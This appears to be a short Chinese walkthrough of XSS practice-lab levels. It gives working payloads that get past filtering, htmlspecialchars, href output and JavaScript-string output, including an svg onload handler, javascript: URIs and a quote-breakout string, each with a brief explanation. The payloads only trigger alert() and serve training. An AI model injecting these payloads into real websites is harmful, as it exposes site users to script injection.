一、xss之过滤

<svg onload=alert("过关啦")>

二、xss之htmlspecialchars

javascript:alert(123)

原理：输入测试文本为herf的属性值和内容值，所以转换思路直接变为js代码OK了

三、xss之href输出

JavaScript:alert('假客套')

原理：测试一个文本，输入提交之后，成了为了蓝色文本的herf属性值，所以我们把属性值改为js代码就OK了

四、xss之js输出

拼接新的js代码

'; alert('XSS'); //